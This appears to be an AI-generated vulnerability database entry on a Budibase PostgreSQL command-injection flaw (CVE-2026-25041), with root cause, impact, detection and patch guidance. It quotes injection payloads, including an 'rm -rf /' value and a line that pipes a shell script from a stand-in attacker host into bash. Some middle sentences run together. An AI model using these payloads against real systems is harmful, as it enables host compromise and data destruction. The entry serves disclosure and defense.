
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-25041 is an OS command injection vulnerability in the PostgreSQL integration of Budibase, a low-code platform for building internal tools. The flaw exists in packages/server/src/integrations/postgres.ts (lines 529–531), where database connection parameters — including the password — are directly interpolated into a shell command string passed to Node.js's exec() without sanitization. All Budibase versions up to and including 3.23.22 are affected; the patched version is 3.23.32. It was disclosed on March 9, 2026, with a CVSS v3.1 score of 7.2 (High) and a CVSS v4.0 score of 8.6 (High) (Github Advisory, Budibase Advisory).
The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command) and CWE-77 (Command Injection). The vulnerable code constructs a shell command by directly interpolating user-controlled PostgreSQL configuration values — specifically the password field — into a template literal: PGPASSWORD="${this.config.password}" pg_dump --schema-only "${dumpCommandParts.join(" ")}", which is then executed via Node.js's child_process.exec(). An attacker who controls database configuration values (e.g., via compromised admin credentials or configuration injection) can break out of the quoted string using payloads such as password"; malicious-command; echo " or inject into the database name field with db"; rm -rf /; echo ". This feature was restricted to self-hosted deployments only, as Budibase Cloud explicitly blocked the getExternalSchema() endpoint to prevent shell injection (Budibase Advisory, Vulnerable Source).
Successful exploitation allows an authenticated attacker with database configuration access to execute arbitrary OS commands as the Budibase server process, resulting in full system compromise, data exfiltration, and potential destruction of data (e.g., rm -rf /). The impact spans confidentiality, integrity, and availability of the host system. Because the injected commands run in the server process context, an attacker could pivot to other internal services, install backdoors, or exfiltrate sensitive application and database credentials (Github Advisory, Budibase Advisory).
No confirmed in-the-wild exploitation has been observed, and no standalone proof-of-concept exploit code is publicly available beyond the illustrative payloads included in the security advisory itself. The EPSS score is approximately 0.082% (24th percentile), indicating a low near-term exploitation probability. Exploitation requires high privileges — specifically, the ability to modify PostgreSQL datasource configuration within a self-hosted Budibase instance — limiting the attack surface. The vulnerability is not listed in the CISA KEV catalog, and no threat actor attribution has been reported (Github Advisory, Budibase Advisory).
password"; <malicious-command>; echo " — for example, password"; curl http://attacker.com/shell.sh | bash; echo ".getExternalSchema() method and constructs the vulnerable shell command.child_process.exec(), causing the injected command to run as the Budibase server process, enabling reverse shell, data exfiltration, or further lateral movement (Budibase Advisory, Vulnerable Source)./api/datasources/<id>/schema/external followed by unexpected process output or errors from pg_dump; Node.js process logs containing shell error messages or unexpected stdout from exec() calls.bash, sh, curl, wget, python, nc) visible via ps aux or process monitoring tools.Upgrade Budibase to version 3.23.32 or later, which removes the vulnerable getExternalSchema() endpoint and the associated shell command construction entirely from the PostgreSQL integration (Github Advisory, Patch Commit). If immediate patching is not possible, restrict database configuration access to trusted administrators only and implement network-level controls to limit who can modify PostgreSQL connection settings. As a defense-in-depth measure, run the Budibase server process with a least-privilege OS account to limit the blast radius of any command injection. Note that Budibase Cloud was not affected, as the endpoint was already blocked in that environment.
The vulnerability was reported by security researcher omkarparth and published by Budibase maintainer mjashanks on March 9, 2026. The advisory was noted across automated CVE tracking platforms including Bluesky CVE feeds, ENISA's EUVD, and INCIBE-CERT shortly after disclosure, but no significant independent researcher commentary or media coverage has been identified (Budibase Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."